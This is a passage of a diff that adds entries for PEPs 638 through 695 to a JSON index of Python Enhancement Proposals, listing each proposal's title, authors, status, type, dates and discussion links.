Macros", + "authors": "Mark Shannon", + "discussions_to": "https://mail.python.org/archives/list/python-dev@python.org/thread/U4C4XHNRC4SHS3TPZWCTY4SN4QU3TT6V/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "24-Sep-2020", + "python_version": null, + "post_history": "26-Sep-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0638/" + }, + "639": { + "number": 639, + "title": "Improving License Clarity with Better Package Metadata", + "authors": "Philippe Ombredanne, C.A.M. 
Gerlach, Karolina Surma", + "discussions_to": "https://discuss.python.org/t/53020", + "status": "Provisional", + "type": "Standards Track", + "topic": "packaging", + "created": "15-Aug-2019", + "python_version": null, + "post_history": "`15-Aug-2019 `__, `17-Dec-2021 `__, `10-May-2024 `__,", + "resolution": "https://discuss.python.org/t/53020/106", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0639/" + }, + "640": { + "number": 640, + "title": "Unused variable syntax", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "04-Oct-2020", + "python_version": "3.10", + "post_history": "19-Oct-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0640/" + }, + "641": { + "number": 641, + "title": "Using an underscore in the version portion of Python 3.10 compatibility tags", + "authors": "Brett Cannon, Steve Dower, Barry Warsaw", + "discussions_to": "https://discuss.python.org/t/pep-641-using-an-underscore-in-the-version-portion-of-python-3-10-compatibility-tags/5513", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "20-Oct-2020", + "python_version": "3.10", + "post_history": "21-Oct-2020", + "resolution": "https://discuss.python.org/t/pep-641-using-an-underscore-in-the-version-portion-of-python-3-10-compatibility-tags/5513/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0641/" + }, + "642": { + "number": 642, + "title": "Explicit Pattern Syntax for Structural Pattern Matching", + "authors": "Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "26-Sep-2020", + "python_version": "3.10", + "post_history": "31-Oct-2020, 08-Nov-2020, 03-Jan-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3/", + "requires": "634", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0642/" + }, + "643": { + "number": 643, + "title": "Metadata for Package Source Distributions", + "authors": "Paul Moore", + "discussions_to": "https://discuss.python.org/t/pep-643-metadata-for-package-source-distributions/5577", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "24-Oct-2020", + "python_version": null, + "post_history": "24-Oct-2020, 01-Nov-2020, 02-Nov-2020, 14-Nov-2020", + "resolution": "https://discuss.python.org/t/pep-643-metadata-for-package-source-distributions/5577/53", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0643/" + }, + "644": { + "number": 644, + "title": "Require OpenSSL 1.1.1 or newer", + "authors": "Christian Heimes", + "discussions_to": "https://discuss.python.org/t/pep-644-require-openssl-1-1-or-newer/5584", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Oct-2020", + "python_version": "3.10", + "post_history": "27-Oct-2020, 03-Mar-2021, 17-Mar-2021, 17-Apr-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/INLCO2EZVQW7R7J2OL6HWVLVU3TQRAZV/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": 
"https://peps.python.org/pep-0644/" + }, + "645": { + "number": 645, + "title": "Allow writing optional types as ``x?``", + "authors": "Maggie Moss", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "25-Aug-2020", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/E75SPV6DDHLEEFSA5MBN5HUOQWDMUQJ2/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0645/" + }, + "646": { + "number": 646, + "title": "Variadic Generics", + "authors": "Mark Mendoza, Matthew Rahtz, Pradeep Kumar Srinivasan, Vincent Siles", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "16-Sep-2020", + "python_version": "3.11", + "post_history": "07-Oct-2020, 23-Dec-2020, 29-Dec-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/OR5RKV7GAVSGLVH3JAGQ6OXFAXIP5XDX/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0646/" + }, + "647": { + "number": 647, + "title": "User-Defined Type Guards", + "authors": "Eric Traut", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "07-Oct-2020", + "python_version": "3.10", + "post_history": "28-Dec-2020, 09-Apr-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/2ME6F6YUVKHOQYKSHTVQQU5WD4CVAZU4/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0647/" + }, + "648": { + "number": 648, + "title": "Extensible customizations of the interpreter at startup", + "authors": "Mario Corchero", + "discussions_to": "https://discuss.python.org/t/pep-648-extensible-customizations-of-the-interpreter-at-startup/6403", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "30-Dec-2020", + "python_version": "3.11", + "post_history": "16-Dec-2020, 18-Dec-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0648/" + }, + "649": { + "number": 649, + "title": "Deferred Evaluation Of Annotations Using Descriptors", + "authors": "Larry Hastings", + "discussions_to": "https://discuss.python.org/t/pep-649-deferred-evaluation-of-annotations-tentatively-accepted/21331/", + "status": "Accepted", + "type": "Standards Track", + "topic": "typing", + "created": "11-Jan-2021", + "python_version": "3.14", + "post_history": "`11-Jan-2021 `__, `12-Apr-2021 `__, `18-Apr-2021 `__, `09-Aug-2021 `__, `20-Oct-2021 `__, `20-Oct-2021 `__, `17-Nov-2021 `__, `15-Mar-2022 `__, `23-Nov-2022 `__, `07-Feb-2023 `__, `11-Apr-2023 `__,", + "resolution": "`08-May-2023 `__", + "requires": null, + "replaces": "563", + "superseded_by": null, + "url": "https://peps.python.org/pep-0649/" + }, + "650": { + "number": 650, + "title": "Specifying Installer Requirements for Python Projects", + "authors": "Vikram Jayanthi, Dustin Ingram, Brett Cannon", + "discussions_to": "https://discuss.python.org/t/pep-650-specifying-installer-requirements-for-python-projects/6657", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jul-2020", + "python_version": null, + "post_history": "14-Jan-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": 
"https://peps.python.org/pep-0650/" + }, + "651": { + "number": 651, + "title": "Robust Stack Overflow Handling", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "18-Jan-2021", + "python_version": null, + "post_history": "19-Jan-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0651/" + }, + "652": { + "number": 652, + "title": "Maintaining the Stable ABI", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pre-pep-maintaining-the-stable-abi/6986/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2021", + "python_version": "3.10", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/IN4XMFLQJ6D6V67EXU27GV3QWSEHHNNH/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0652/" + }, + "653": { + "number": 653, + "title": "Precise Semantics for Pattern Matching", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "09-Feb-2021", + "python_version": null, + "post_history": "18-Feb-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0653/" + }, + "654": { + "number": 654, + "title": "Exception Groups and except*", + "authors": "Irit Katriel, Yury Selivanov, Guido van Rossum", + "discussions_to": "https://discuss.python.org/t/accepting-pep-654-exception-groups-and-except/10813", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2021", + "python_version": "3.11", + "post_history": "`22-Feb-2021 `__, `20-Mar-2021 `__, `03-Oct-2021 `__,", + "resolution": "https://discuss.python.org/t/accepting-pep-654-exception-groups-and-except/10813/1", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0654/" + }, + "655": { + "number": 655, + "title": "Marking individual TypedDict items as required or potentially-missing", + "authors": "David Foster", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/53XVOD5ZUKJ263MWA6AUPEA6J7LBBLNV/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Jan-2021", + "python_version": "3.11", + "post_history": "31-Jan-2021, 11-Feb-2021, 20-Feb-2021, 26-Feb-2021, 17-Jan-2022, 28-Jan-2022", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/AJEDNVC3FXM5QXNNW5CR4UCT4KI5XVUE/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0655/" + }, + "656": { + "number": 656, + "title": "Platform Tag for Linux Distributions Using Musl", + "authors": "Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/7165", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "17-Mar-2021", + "python_version": null, + "post_history": "17-Mar-2021, 18-Apr-2021", + "resolution": "https://discuss.python.org/t/7165/32", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0656/" + }, + "657": { + "number": 657, + "title": "Include Fine Grained Error Locations in Tracebacks", + "authors": "Pablo Galindo, Batuhan Taskaya, Ammar Askar", + "discussions_to": 
"https://discuss.python.org/t/pep-657-include-fine-grained-error-locations-in-tracebacks/8629", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-May-2021", + "python_version": "3.11", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0657/" + }, + "658": { + "number": 658, + "title": "Serve Distribution Metadata in the Simple Repository API", + "authors": "Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/8651", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "10-May-2021", + "python_version": null, + "post_history": "10-May-2021", + "resolution": "https://discuss.python.org/t/8651/48", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0658/" + }, + "659": { + "number": 659, + "title": "Specializing Adaptive Interpreter", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "13-Apr-2021", + "python_version": null, + "post_history": "11-May-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0659/" + }, + "660": { + "number": 660, + "title": "Editable installs for pyproject.toml based builds (wheel based)", + "authors": "Daniel Holth, St\u00e9phane Bidoul", + "discussions_to": "https://discuss.python.org/t/draft-pep-editable-installs-for-pep-517-style-build-backends/8510", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "30-Mar-2021", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pronouncement-on-peps-660-and-662-editable-installs/9450", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0660/" + }, + "661": { + "number": 661, + "title": "Sentinel Values", + "authors": "Tal Einat", + "discussions_to": "https://discuss.python.org/t/pep-661-sentinel-values/9126", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "06-Jun-2021", + "python_version": null, + "post_history": "`20-May-2021 `__, `06-Jun-2021 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0661/" + }, + "662": { + "number": 662, + "title": "Editable installs via virtual wheels", + "authors": "Bern\u00e1t G\u00e1bor", + "discussions_to": "https://discuss.python.org/t/discuss-tbd-editable-installs-by-gaborbernat/9071", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "28-May-2021", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pronouncement-on-peps-660-and-662-editable-installs/9450", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0662/" + }, + "663": { + "number": 663, + "title": "Standardizing Enum str(), repr(), and format() behaviors", + "authors": "Ethan Furman", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "30-Jun-2021", + "python_version": "3.11", + "post_history": "20-Jul-2021, 02-Nov-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/RN3WCRZSTQR55DOHJTZ2KIO6CZPJPCU7/", + "requires": null, + "replaces": null, + 
"superseded_by": null, + "url": "https://peps.python.org/pep-0663/" + }, + "664": { + "number": 664, + "title": "Python 3.11 Release Schedule", + "authors": "Pablo Galindo Salgado", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "12-Jul-2021", + "python_version": "3.11", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0664/" + }, + "665": { + "number": 665, + "title": "A file format to list Python dependencies for reproducibility of an application", + "authors": "Brett Cannon, Pradyun Gedam, Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/9911", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "29-Jul-2021", + "python_version": null, + "post_history": "29-Jul-2021, 03-Nov-2021, 25-Nov-2021", + "resolution": "https://discuss.python.org/t/pep-665-take-2-a-file-format-to-list-python-dependencies-for-reproducibility-of-an-application/11736/140", + "requires": null, + "replaces": null, + "superseded_by": "751", + "url": "https://peps.python.org/pep-0665/" + }, + "666": { + "number": 666, + "title": "Reject Foolish Indentation", + "authors": "Laura Creighton", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "03-Dec-2001", + "python_version": "2.2", + "post_history": "05-Dec-2001", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0666/" + }, + "667": { + "number": 667, + "title": "Consistent views of namespaces", + "authors": "Mark Shannon, Tian Gao", + "discussions_to": "https://discuss.python.org/t/46631", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Jul-2021", + "python_version": "3.13", + "post_history": "20-Aug-2021, 22-Feb-2024", + "resolution": "`25-Apr-2024 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0667/" + }, + "668": { + "number": 668, + "title": "Marking Python base environments as \u201cexternally managed\u201d", + "authors": "Geoffrey Thomas, Matthias Klose, Filipe La\u00edns, Donald Stufft, Tzu-ping Chung, Stefano Rivera, Elana Hashman, Pradyun Gedam", + "discussions_to": "https://discuss.python.org/t/10302", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "18-May-2021", + "python_version": null, + "post_history": "28-May-2021", + "resolution": "https://discuss.python.org/t/10302/44", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0668/" + }, + "669": { + "number": 669, + "title": "Low Impact Monitoring for CPython", + "authors": "Mark Shannon", + "discussions_to": "https://discuss.python.org/t/pep-669-low-impact-monitoring-for-cpython/13018/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-Aug-2021", + "python_version": "3.12", + "post_history": "`07-Dec-2021 `__, `10-Jan-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-669-low-impact-monitoring-for-cpython/13018/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0669/" + }, + "670": { + "number": 670, + "title": "Convert macros to functions in the Python C API", + "authors": "Erlend Egeberg Aasland, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": 
"Standards Track", + "topic": "", + "created": "19-Oct-2021", + "python_version": "3.11", + "post_history": "`20-Oct-2021 `__, `08-Feb-2022 `__, `22-Feb-2022 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/QQFCJ7LR36RUZSC3WI6WZZMQVQ3ZI4MS/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0670/" + }, + "671": { + "number": 671, + "title": "Syntax for late-bound function argument defaults", + "authors": "Chris Angelico", + "discussions_to": "https://mail.python.org/archives/list/python-ideas@python.org/thread/UVOQEK7IRFSCBOH734T5GFJOEJXFCR6A/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "24-Oct-2021", + "python_version": "3.12", + "post_history": "`24-Oct-2021 `__, `01-Dec-2021 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0671/" + }, + "672": { + "number": 672, + "title": "Unicode-related Security Considerations for Python", + "authors": "Petr Viktorin", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "01-Nov-2021", + "python_version": null, + "post_history": "01-Nov-2021", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0672/" + }, + "673": { + "number": 673, + "title": "Self Type", + "authors": "Pradeep Kumar Srinivasan, James Hilton-Balfe", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "10-Nov-2021", + "python_version": "3.11", + "post_history": "17-Nov-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/J7BWL5KWOPQQK5KFWKENVLXW6UGSPTGI/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0673/" + }, + "674": { + "number": 674, + "title": "Disallow using macros as l-values", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "30-Nov-2021", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0674/" + }, + "675": { + "number": 675, + "title": "Arbitrary Literal String Type", + "authors": "Pradeep Kumar Srinivasan, Graham Bleaney", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/VB74EHNM4RODDFM64NEEEBJQVAUAWIAW/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "30-Nov-2021", + "python_version": "3.11", + "post_history": "07-Feb-2022", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/XEOOSSPNYPGZ5NXOJFPLXG2BTN7EVRT5/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0675/" + }, + "676": { + "number": 676, + "title": "PEP Infrastructure Process", + "authors": "Adam Turner", + "discussions_to": "https://discuss.python.org/t/10774", + "status": "Active", + "type": "Process", + "topic": "", + "created": "01-Nov-2021", + "python_version": null, + "post_history": "23-Sep-2021, 30-Nov-2021", + "resolution": "https://discuss.python.org/t/10774/99", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0676/" + }, + "677": { + "number": 677, + "title": "Callable 
Type Syntax", + "authors": "Steven Troxler, Pradeep Kumar Srinivasan", + "discussions_to": "python-dev@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "typing", + "created": "13-Dec-2021", + "python_version": "3.11", + "post_history": "16-Dec-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/NHCLHCU2XCWTBGF732WESMN42YYVKOXB/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0677/" + }, + "678": { + "number": 678, + "title": "Enriching Exceptions with Notes", + "authors": "Zac Hatfield-Dodds", + "discussions_to": "https://discuss.python.org/t/pep-678-enriching-exceptions-with-notes/13374", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Dec-2021", + "python_version": "3.11", + "post_history": "27-Jan-2022", + "resolution": "https://discuss.python.org/t/pep-678-enriching-exceptions-with-notes/13374/100", + "requires": "654", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0678/" + }, + "679": { + "number": 679, + "title": "Allow parentheses in assert statements", + "authors": "Pablo Galindo Salgado", + "discussions_to": "https://discuss.python.org/t/pep-679-allow-parentheses-in-assert-statements/13003", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "07-Jan-2022", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0679/" + }, + "680": { + "number": 680, + "title": "tomllib: Support for Parsing TOML in the Standard Library", + "authors": "Taneli Hukkinen, Shantanu Jain", + "discussions_to": "https://discuss.python.org/t/13040", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Jan-2022", + "python_version": "3.11", + "post_history": "09-Dec-2021, 27-Jan-2022", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/3AHGWYY562HHO55L4Z2OVYUFZP5W73IS/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0680/" + }, + "681": { + "number": 681, + "title": "Data Class Transforms", + "authors": "Erik De Bonte, Eric Traut", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/EAALIHA3XEDFDNG2NRXTI3ERFPAD65Z4/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "02-Dec-2021", + "python_version": "3.11", + "post_history": "24-Apr-2021, 13-Dec-2021, 22-Feb-2022", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/R4A2IYLGFHKFDYJPSDA5NFJ6N7KRPJ6D/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0681/" + }, + "682": { + "number": 682, + "title": "Format Specifier for Signed Zero", + "authors": "John Belmonte", + "discussions_to": "https://discuss.python.org/t/pep-682-format-specifier-for-signed-zero/13596", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jan-2022", + "python_version": "3.11", + "post_history": "08-Feb-2022", + "resolution": "https://discuss.python.org/t/accepting-pep-682-format-specifier-for-signed-zero/14088", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0682/" + }, + "683": { + "number": 683, + "title": "Immortal Objects, Using a Fixed Refcount", + 
"authors": "Eric Snow, Eddie Elizondo", + "discussions_to": "https://discuss.python.org/t/18183", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2022", + "python_version": "3.12", + "post_history": "`16-Feb-2022 `__, `19-Feb-2022 `__, `28-Feb-2022 `__, `12-Aug-2022 `__,", + "resolution": "https://discuss.python.org/t/18183/26", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0683/" + }, + "684": { + "number": 684, + "title": "A Per-Interpreter GIL", + "authors": "Eric Snow", + "discussions_to": "https://discuss.python.org/t/pep-684-a-per-interpreter-gil/19583", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Mar-2022", + "python_version": "3.12", + "post_history": "`08-Mar-2022 `__, `29-Sep-2022 `__, `28-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/19583/42", + "requires": "683", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0684/" + }, + "685": { + "number": 685, + "title": "Comparison of extra names for optional distribution dependencies", + "authors": "Brett Cannon", + "discussions_to": "https://discuss.python.org/t/14141", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Mar-2022", + "python_version": null, + "post_history": "`08-Mar-2022 `__", + "resolution": "https://discuss.python.org/t/pep-685-comparison-of-extra-names-for-optional-distribution-dependencies/14141/55", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0685/" + }, + "686": { + "number": 686, + "title": "Make UTF-8 mode default", + "authors": "Inada Naoki", + "discussions_to": "https://discuss.python.org/t/14737", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "18-Mar-2022", + "python_version": "3.15", + "post_history": "`18-Mar-2022 `__, `31-Mar-2022 `__", + "resolution": "https://discuss.python.org/t/14737/9", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0686/" + }, + "687": { + "number": 687, + "title": "Isolating modules in the standard library", + "authors": "Erlend Egeberg Aasland, Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/14824", + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "04-Apr-2022", + "python_version": "3.12", + "post_history": "`04-Apr-2022 `__, `11-Apr-2022 `__", + "resolution": "https://discuss.python.org/t/14824/4", + "requires": "489, 573, 630", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0687/" + }, + "688": { + "number": 688, + "title": "Making the buffer protocol accessible in Python", + "authors": "Jelle Zijlstra", + "discussions_to": "https://discuss.python.org/t/19756", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "23-Apr-2022", + "python_version": "3.12", + "post_history": "`23-Apr-2022 `__, `25-Apr-2022 `__, `06-Oct-2022 `__, `26-Oct-2022 `__", + "resolution": "`07-Mar-2023 `__", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0688/" + }, + "689": { + "number": 689, + "title": "Unstable C API tier", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-689-unstable-c-api-tier/20452", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Apr-2022", + "python_version": "3.12", + 
"post_history": "`27-Apr-2022 `__, `25-Aug-2022 `__, `27-Oct-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-689-unstable-c-api-tier/20452/13", + "requires": "523", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0689/" + }, + "690": { + "number": 690, + "title": "Lazy Imports", + "authors": "Germ\u00e1n M\u00e9ndez Bravo, Carl Meyer", + "discussions_to": "https://discuss.python.org/t/pep-690-lazy-imports/15474", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Apr-2022", + "python_version": "3.12", + "post_history": "`03-May-2022 `__, `03-May-2022 `__", + "resolution": "https://discuss.python.org/t/pep-690-lazy-imports-again/19661/26", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0690/" + }, + "691": { + "number": 691, + "title": "JSON-based Simple API for Python Package Indexes", + "authors": "Donald Stufft, Pradyun Gedam, Cooper Lees, Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/pep-691-json-based-simple-api-for-python-package-indexes/15553", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "04-May-2022", + "python_version": null, + "post_history": "`05-May-2022 `__", + "resolution": "https://discuss.python.org/t/pep-691-json-based-simple-api-for-python-package-indexes/15553/70", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0691/" + }, + "692": { + "number": 692, + "title": "Using TypedDict for more precise \\*\\*kwargs typing", + "authors": "Franek Magiera", + "discussions_to": "https://discuss.python.org/t/pep-692-using-typeddict-for-more-precise-kwargs-typing/17314", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "29-May-2022", + "python_version": "3.12", + "post_history": "`29-May-2022 `__, `12-Jul-2022 `__, `12-Jul-2022 `__,", + "resolution": "https://discuss.python.org/t/pep-692-using-typeddict-for-more-precise-kwargs-typing/17314/81", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0692/" + }, + "693": { + "number": 693, + "title": "Python 3.12 Release Schedule", + "authors": "Thomas Wouters", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "24-May-2022", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0693/" + }, + "694": { + "number": 694, + "title": "Upload 2.0 API for Python Package Repositories", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/pep-694-upload-2-0-api-for-python-package-repositories/16879", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Jun-2022", + "python_version": null, + "post_history": "`27-Jun-2022 `__", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0694/" + }, + "695": { + "number": 695, + "title": "Type Parameter Syntax", + "authors": "Eric Traut", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/BB2BGYJY2YG5IWESKGTAPUQL3N27ZKVW/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "15-Jun-2022", + "python_version": "3.12", + "post_history": "`20-Jun-2022 `__, `04-Dec-2022 `__", + "resolution": 
